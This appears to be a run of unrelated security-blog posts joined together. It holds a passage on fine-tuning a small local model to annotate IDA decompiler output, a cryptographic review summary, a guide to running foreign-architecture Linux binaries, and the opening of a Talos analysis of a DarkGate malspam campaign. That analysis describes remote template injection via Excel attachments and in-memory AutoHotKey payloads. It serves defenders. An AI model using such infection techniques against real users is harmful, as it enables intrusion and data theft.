        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory / max_memory * 100, 3)
lora_percentage = round(used_memory_for_lora / max_memory * 100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")

The script also defines the following checkpointing options within TrainingArguments:

output_dir = "outputs",
save_strategy = "steps",
save_steps = 50

This configuration will save a copy of the fine-tuned weights every 50 steps to the outputs directory, which is helpful for a few reasons. First, if an error occurs at some point (crash/power/etc.), you have checkpoints you can restart your training from; second, it allows you to effectively evaluate how well your training is working by comparing each saved checkpoint. While it may seem at first that more steps are better, the right number depends on how large your dataset is and which settings you have configured - more is not always better.
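One nice side effect: if a run is interrupted, it can be resumed from the most recent checkpoint rather than starting over. A minimal sketch - resume_from_checkpoint is standard Hugging Face Trainer behavior that SFTTrainer inherits:

# picks up the latest checkpoint saved under output_dir ("outputs") and continues training
trainer_stats = trainer.train(resume_from_checkpoint=True)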

Running this script to fine tune mistral-7b-instruct for 100 steps using the dataset we created would look like the following example output:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}

After training is complete, I used a small script to evaluate how each checkpoint performs. To do this, I take the first 10 entries from the training dataset and use the instruction and input values to generate a new output, as well as generating an output for an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
# generate outputs for the first sample_size items from the training dataset
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# a new input that is not in the dataset; note this reuses the instruction text from the last dataset entry
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

print('Capturing pre training generation samples')
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r)

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in $(ls outputs); do python eval.py outputs/$m; done

Results?

So, with training out of the way, the question is: does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well, and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches it perfectly - the somewhat surprising result is that the function comment is better at 50 steps than at 100 steps.

Zooming out a bit and comparing further steps, the format stays perfect, while the most common errors seen are confusion about what gets returned (value vs allocated memory) and inconsistent numeric formats (1000 vs 0x1000):

The real check is: how does this compare to the big models…

It is interesting to see that GPT3.5 is no better than our results - in fact, it performs worse than our 50-step results, falling into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair as it is quite old; what about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So the end result is: just use GPT4; using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we have tried our best with our small model, we can move on and just use GPT4 - just not in the way you would expect. Going back to the Alpaca project, they call out using an existing strong language model to automatically generate instruction data, whereas so far we have used our small 7b parameter model to generate our instruction data. This is where we step back slightly and redo some of our previous work, replacing our 'low quality' generated data with 'high quality' values from the current leading model.

Using the OpenAI playground, it is fairly simple to set up an 'assistant' with our instructions:

With the configuration working as expected, it is straightforward to use the API to execute the same instruction generation we previously performed.
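For reference, the generation call looks roughly like the following with the official openai Python package (a minimal sketch - SYSTEM_PROMPT stands in for the instruction prompt developed earlier, and the model name should be whichever GPT4 variant you have access to):

from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

SYSTEM_PROMPT = "Analyze the following code ..."  # the instruction prompt developed earlier

def analyze(code):
    resp = client.chat.completions.create(
        model="gpt-4",  # assumption: substitute the GPT4 variant you have access to
        messages=[
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": code},
        ],
    )
    return resp.choices[0].message.content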

I originally had no expectations related to the cost of this process; to be safe, I added $50 to my account before executing the previous step, and I was surprised when it only cost ~$16 at the time:

Seeing that it only cost ~$16 for the initial run and the quality of the responses was good, I figured: why not use both sets of data and get 2x the high-quality instruction data?

With the brand-new high-quality dataset complete, we can circle back and start a new fine-tune of our mistral-7b model - in this case trained for 200 steps, taking snapshots every 50 steps. After training completed, an evaluation was done against a new input that is not in either dataset, comparing our old 'low-quality' fine-tune with the new one.

At 50 steps, the new GPT4-trained version already performs much better at capturing variables to rename; interestingly, the description from the LLM-trained model contains more direct references to the code, while the GPT4 description is slightly higher level:

At 100 steps, the variable names from the GPT4-trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM-trained model has picked up the extra variable renames, but they look to be in line with what the GPT4-trained model had at 50 steps. I also thought it was interesting that the LLM-trained model refers to [2] as the third field (mathematically correct):

At 150 steps, the GPT4-trained model has slightly improved the function description while maintaining the variable renames. The LLM-trained model has improved the function name to match the GPT4-trained model at 50 steps, while losing variable renames - interestingly, it now refers to [2] as the second element:

Finally, at 200 steps, the GPT4-trained model has slightly tweaked its description. The LLM-trained model has rediscovered its variable renames from the 100-step version and also refined how it references [2] within the code:

Clearly the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly…

That response looks like something we have seen already. At this point, I would say we have proven it is feasible to fine-tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. A few other plugins offer similar functionality.

I decided to write my own simple version - apologies in advance for any errors or poor design decisions; the underlying fine-tuned model is available to use with whatever you like best. Building off the simple Python client shown earlier, I again chose to use Ollama's REST service instead of loading the model directly. I like this design for a few reasons:

  • minimal Python requirements
  • the service can be running on a remote machine with more compute
  • reloads/maintenance/updates will not interrupt your weeks-long IDA session
  • avoids tying IDA up with a large memory footprint - yes, the session you have had running for weeks now :)

To set up Ollama to use the new model, download the weights and the Modelfile into the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window:

In this example the plugin has been configured with a single model; if you have other models loaded within your Ollama service, they can be added and will appear within the context menu as well. After activating the menu item, the plugin will query the selected model with the Hex-Rays code and display a dialog when it is complete:

Within this dialog, each returned value can be accepted individually by selecting its checkbox (enabled by default) and clicking Accept; clicking Cancel will reject all changes and close the dialog.

In this example, the results are accepted and applied fully:

This example shows rejecting the function name and description, only applying the variable renames:

There is also nothing stopping you from accepting all changes multiple times:

Another consideration I had when creating aiDAPal was implementing some form of data lookup like Retrieval Augmented Generation (RAG), but in the spirit of keeping things simple I came up with the idea of treating the IDA database (IDB) as the lookup/knowledge base. The basic idea is that whenever the plugin is activated, it identifies any references within the code being analyzed, retrieves any comments that exist at the target locations, and includes them as a multi-line comment before the function that is sent for analysis.
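A minimal sketch of that comment harvesting is shown below (assumptions: this runs inside IDA with Hex-Rays available, and only instruction-level xrefs with regular/repeatable comments are considered - the actual plugin may differ):

import idautils, idc, ida_hexrays

def context_comments(func_ea):
    # walk each instruction in the function and collect comments at referenced locations
    notes = []
    for item_ea in idautils.FuncItems(func_ea):
        for xref in idautils.XrefsFrom(item_ea, 0):
            cmt = idc.get_cmt(xref.to, 0) or idc.get_cmt(xref.to, 1)
            if cmt:
                notes.append(f"{idc.get_name(xref.to)}: {cmt}")
    return notes

def build_prompt(func_ea):
    code = str(ida_hexrays.decompile(func_ea))
    notes = context_comments(func_ea)
    # prepend the harvested knowledge as a multi-line comment before the pseudocode
    header = "/*\n" + "\n".join(notes) + "\n*/\n" if notes else ""
    return header + code

An example of this workflow can be seen in the following image: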

For this example, the WDT_ICR register location is queried for any comments; if one exists, it gets extracted and included in our request. Something to consider is that in this case, the WDT_ICR register is common and part of the 'base knowledge' stored within the original trained weights, so it would have been identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information/knowledge to better guide the response. In the following image, the comment associated with the WDT_ICR register has been changed, resulting in the model returning a different result that takes the additional knowledge provided by the IDB into account:

Currently, this functionality does not extract information from comments that may be defined at the start of a called function; while that would be useful and give context as to what a called function does, it would often result in the inclusion of a large number of extra tokens, potentially exhausting the underlying model's context window and returning low-quality results.

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune an LLM for local usage, whether that is making a better version of the one we are sharing or something completely different. It is also worth noting that most of this project was executed earlier this year (February/March); since then, a handful of new models have been released that would be interesting to explore/adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Public Report – Keyfork Implementation Review

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and several low-impact findings were uncovered, each of which was promptly addressed by Distrust.

Cross-Execute Your Linux Binaries, Don’t Cross-Compile Them

Lolbins? Where we’re going, we don’t need lolbins.

At NCC Group, as a consultant in our hardware and embedded systems practice, I often get to play with various devices, which is always fun, but getting your own software to run on them can be a bit of a pain.
This article documents a few realisations and tricks that make my life easier. There is nothing new about anything mentioned here, but there is also hardly anything written about these (ab)use cases.

The challenges we are looking to solve are:

  • Running standard Linux tools on your embedded device
  • Compiling your own tools to run on the embedded device
  • Running binaries from the embedded device on your PC

This can often be achieved by cross-compiling and/or statically compiling the target binary. It is very much a valid approach, but it can also be time-consuming, even when you’re seasoned at this sort of thing. So, the approach described here does not do that.

Taking the dependency libraries with you

The realisation is that while dynamically linked binaries need some of the environment, it is actually not that hard to figure out what that environment is and to copy it over to the system where you want to run the binary.

Consider the example of running strace from an arm64 Raspberry Pi on an arm64 Android phone.

Just copying won’t work, since Android differs too much from common Linux distributions:

pi@rpi:~ $ adb push `which strace` /data/local/tmp
/usr/bin/strace: 1 file pushed, 0 skipped. 16.0 MB/s (1640712 bytes in 0.098s)
pi@rpi:~ $ adb exec-out /data/local/tmp/strace -ttewrite /bin/echo X
/system/bin/sh: /data/local/tmp/strace: No such file or directory
pi@rpi:~ $ adb exec-out ldd /data/local/tmp/strace 
    linux-vdso.so.1 => [vdso] (0x73edb38000)
CANNOT LINK EXECUTABLE "linker64": library "libc.so.6" not found: needed by main executable

We can list the dependencies: strace depends on the dynamic linker, libraries, and often on some special bits like the vDSO.

pi@rpi:~ $ ldd `which strace`
    linux-vdso.so.1 (0x0000007faf464000)
    libc.so.6 => /lib/aarch64-linux-gnu/libc.so.6 (0x0000007faf0b0000)
    /lib/ld-linux-aarch64.so.1 (0x0000007faf427000)

We can copy the dependencies and use the appropriate dynamic linker to load them (the embedded ldd/sed invocation in the one-liner below enumerates the dependencies):

pi@rpi:~ $ bin=`which strace`; adb push $bin $(ldd $bin | sed -nre 's/^[^/]*(\/.*) \(0x.*\)$/\1/p') /data/local/tmp/
/usr/bin/strace: 1 file pushed, 0 skipped. 19.4 MB/s (1640712 bytes in 0.081s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 23.7 MB/s (1651472 bytes in 0.067s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 18.6 MB/s (202904 bytes in 0.010s)
3 files pushed, 0 skipped. 19.0 MB/s (3495088 bytes in 0.176s)
pi@rpi:~ $ adb exec-out /data/local/tmp/ld-linux-aarch64.so.1 --library-path /data/local/tmp/ /data/local/tmp/strace -ttewrite /bin/echo X
10:36:27.842717 write(1, "X\n", 2X
)      = 2
10:36:27.845895 +++ exited with 0 +++

There, perfect, we have strace on our device now, and it only took two ugly one-liners.

Installing that odd architecture on your PC

My preferred way of setting up a cross-architecture Linux chroot is using debootstrap and schroot. This assumes you are using a distribution from the Debian family (I do see there's debootstrap for Fedora as well; I haven't tried it though).

Logan Chien posted a nice and short guide, which basically boils down to the following three sections:

Setting up the tools

kali@kali:~$ apt install debootstrap qemu-user-static schroot

Installing a base system

kali@kali:~$ sudo debootstrap --arch=arm64 bookworm ~/chroots/arm64-test
...
I: Base system installed successfully.

This takes a minute or two and installs a base Debian Bookworm system for arm64. The distribution names come from Debian (http://ftp.debian.org/debian/dists/) or Ubuntu (http://archive.ubuntu.com/ubuntu/dists/). For the architecture names, navigate into the subfolders (for example http://ftp.debian.org/debian/dists/bookworm/main/). If you need a less common architecture, try the testing channel, which supports riscv64, for example.

Setting up schroot

kali@kali:~$ echo "[arm64-test] 
directory=$HOME/chroots/arm64-test
users=$(whoami)
root-users=$(whoami)
type=directory" | sudo tee /etc/schroot/chroot.d/arm64-test

Now you can enter the chroot:

kali@kali:~$ schroot -c arm64-test
(arm64-test)kali@kali:~$ uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) aarch64 GNU/Linux
(arm64-test)kali@kali:~$ logout
kali@kali:~$ schroot -c arm64-test -u root
(arm64-test)root@kali:/home/kali# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)

Finish

So, here you have it. Install the wanted binary, and copy it to your target device like we did before from the Raspberry Pi.

(arm64-test)kali@kali:~$ # sudo apt install strace adb
...
(arm64-test)kali@kali:~$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
(arm64-test)kali@kali:~$ for i in $(bindeps `which strace`); do adb push $i /data/local/tmp/; done
/usr/bin/strace: 1 file pushed, 0 skipped. 13.3 MB/s (1640712 bytes in 0.117s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 14.0 MB/s (1651472 bytes in 0.113s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 7.4 MB/s (202904 bytes in 0.026s)
(arm64-test)kali@kali:~$ adb shell
sargo:/ $ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
sargo:/ $ xrun strace -tte write /bin/echo X
16:31:59.159266 write(1, "X\n", 2X
)      = 2
16:31:59.163322 +++ exited with 0 +++

Cross-compiling without cross-compiling

Well, now you have a full Linux distribution of your chosen architecture running, so you can just compile any special tools. Sure, it is emulated through QEMU under the hood, but for anything smallish one does not even notice the performance hit.

And you have avoided dealing with a toolchain to cross-compile for that one-off task.

Running the device’s binaries on your PC

In the above examples, the binary we wished to run was copied onto the target device. Occasionally, one wants to do the reverse: run a binary from the device locally on your PC.

The exact same approach should work, and for anything non-trivial I would recommend a custom-built chroot, so you can easily place the required files in the correct locations (and it is also easy to delete it all later).

For a simple tool though, one can get away by using QEMU:

kali@kali:~/android_test$ adb exec-out 'bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }; bindeps `which dexdump`' | xargs -n1 adb pull
/apex/com.android.art/bin/dexdump: 1 file pulled, 0 skipped. 11.6 MB/s (108744 bytes in 0.009s)
/apex/com.android.art/lib64/libdexfile.so: 1 file pulled, 0 skipped. 4.7 MB/s (347040 bytes in 0.070s)
/apex/com.android.art/lib64/libartpalette.so: 1 file pulled, 0 skipped. 2.0 MB/s (14896 bytes in 0.007s)
/apex/com.android.art/lib64/libbase.so: 1 file pulled, 0 skipped. 13.3 MB/s (251152 bytes in 0.018s)
/apex/com.android.art/lib64/libartbase.so: 1 file pulled, 0 skipped. 20.8 MB/s (497272 bytes in 0.023s)
/apex/com.android.art/lib64/libc++.so: 1 file pulled, 0 skipped. 8.1 MB/s (671496 bytes in 0.079s)
/apex/com.android.art/lib64/libziparchive.so: 1 file pulled, 0 skipped. 1.2 MB/s (79752 bytes in 0.066s)
/apex/com.android.runtime/lib64/bionic/libc.so: 1 file pulled, 0 skipped. 26.1 MB/s (1013048 bytes in 0.037s)
/apex/com.android.runtime/lib64/bionic/libdl.so: 1 file pulled, 0 skipped. 2.0 MB/s (13728 bytes in 0.006s)
/apex/com.android.runtime/lib64/bionic/libm.so: 1 file pulled, 0 skipped. 12.7 MB/s (221072 bytes in 0.017s)
/system/lib64/libz.so: 1 file pulled, 0 skipped. 6.5 MB/s (98016 bytes in 0.014s)
/system/lib64/liblog.so: 1 file pulled, 0 skipped. 5.8 MB/s (62176 bytes in 0.010s)
/system/lib64/libc++.so: 1 file pulled, 0 skipped. 25.7 MB/s (700400 bytes in 0.026s)
kali@kali:~/android_test$ adb pull /system/bin/linker64
/system/bin/linker64: 1 file pulled, 0 skipped. 13.1 MB/s (1802728 bytes in 0.131s)
kali@kali:~/android_test$ qemu-arm64 -E LD_LIBRARY_PATH=$PWD ./linker64 $PWD/dexdump
linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
WARNING: linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:126] No file specified
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] Copyright (C) 2007 The Android Open Source Project
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] 
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:42] dexdump: [-a] [-c] [-d] [-e] [-f] [-h] [-i] [-j] [-l layout] [-n]  [-o outfile] dexfile...
...

With the dynamic linker, dependency libraries and the target binary, we can use qemu-user to run our binary.

The observant reader will notice this differs slightly from the way ld was invoked before. It appears Android’s dynamic linker doesn’t support an argument to specify the library path, so we have used LD_LIBRARY_PATH (in the first example above, we could have invoked strace this way as well: LD_LIBRARY_PATH=/data/local/tmp /data/local/tmp/ld-linux-aarch64.so.1 /data/local/tmp/strace).

Epilogue

I hope you found this useful.

Helper functions

The list of dependencies that are to be copied along with the binary can be generated with:

$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
$ bindeps `which strace`

The binary can then be run on the target device with (note that the path will need adjusting, and possibly the linker arguments as well):

$ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
$ xrun strace -tte write /bin/echo X

DarkGate switches up its tactics with new payload, email templates

This post was authored by Kalpesh Mantri. 

  • Cisco Talos is actively tracking a recent increase in activity from malicious email campaigns containing a suspicious Microsoft Excel attachment that, when opened, infected the victim's system with the DarkGate malware. 
  • These campaigns, active since the second week of March, leverage tactics, techniques, and procedures (TTPs) that we have not previously observed in DarkGate attacks. 
  • These campaigns rely on a technique called “Remote Template Injection” to bypass email security controls and to deceive the user into downloading and executing malicious code when the Excel document is opened.  
  • DarkGate has used AutoIT scripts as part of the infection process for a long time. However, in these campaigns, AutoHotKey scripting was used instead of AutoIT.  
  • The final DarkGate payload is designed to execute in-memory, without ever being written to disk, running directly from within the AutoHotKey.exe process. 

The DarkGate malware family is distinguished by its covert spreading techniques, ability to steal information, evasion strategies, and widespread impact on both individuals and organizations. Recently, DarkGate has been observed distributing malware through Microsoft Teams and even via malvertising campaigns. Notably, in the latest campaign, AutoHotKey scripting was employed instead of AutoIT, indicating the continuous evolution of DarkGate actors in altering the infection chain to evade detection. 

Email campaigns 

This research began when a considerable number of our clients reported receiving emails, each containing a Microsoft Excel file attachment that followed a distinct pattern in its naming convention. 

Talos’ intent analysis of these emails revealed that they primarily pertained to financial or official matters, compelling the recipient to take action by opening the attached document. 

This peculiar trend prompted us to conduct an in-depth investigation into this widespread malspam activity. Our initial findings linked the indicators of compromise (IOCs) to the DarkGate malware.  

The table below includes some of the observed changes in attachment naming convention patterns over time.  

Start Date        End Date          Format                      Examples
March 12, 2024    March 19, 2024    march-D%-2024.xlsx          march-D5676-2024.xlsx, march-D3230-2024.xlsx, march-D2091-2024.xlsx
March 15, 2024    March 20, 2024    ACH-%March.xlsx             ACH-5101-15March.xlsx, ACH-5392-15March.xlsx, ACH-4619-15March.xlsx
March 18, 2024    March 19, 2024    attach#%-2024.xlsx          attach#4919-18-03-2024.xlsx, attach#8517-18-03-2024.xlsx, attach#4339-18-03-2024.xlsx
March 19, 2024    March 20, 2024    march19-D%-2024.xlsx        march19-D3175-2024.xlsx, march19-D5648-2024.xlsx, march19-D8858-2024.xlsx
March 26, 2024    March 26, 2024    re-march-26-2024-%.xls?     re-march-26-2024-4187.xlsx, re-march-26-2024-7964.xlsx, re-march-26-2024-4187.xls
April 3, 2024     April 5, 2024     april2024-%.xlsx            april2024-2032.xlsx, april2024-3378.xlsx, april2024-4268.xlsx
April 9, 2024     April 9, 2024     statapril2024-%.xlsx        statapril2024-9505.xlsx, statapril2024-9518.xlsx, statapril2024-9524.xlsx
April 10, 2024    April 10, 2024    4_10_AC-%.xlsx*             4_10_AC-1177.xlsx, 4_10_AC-1288.xlsx, 4_10_AC-1301.xlsx

*Variant redirecting to JavaScript file instead of VBS.

Victimology 

Based on Cisco Talos telemetry, this campaign targets the U.S. most often compared to other geographic regions.

Healthcare technologies and telecommunications were the most-targeted sectors, but campaign activity was observed targeting a wide range of industries. 

Technical analysis 

Our telemetry indicates that malspam emails were the primary delivery vector for this campaign. It is an active campaign using attached Excel documents that attempt to lure users into downloading and executing remote payloads. 

As shown below, the Excel spreadsheet has an embedded object with an external link to an attacker-controlled Server Message Block (SMB) file share. 

The overall infection process associated with this campaign is shown below. 

The infection process begins when the malicious Excel document is opened. These files were specially crafted to use a technique called “Remote Template Injection” to trigger the automatic download and execution of malicious content hosted on a remote server. 

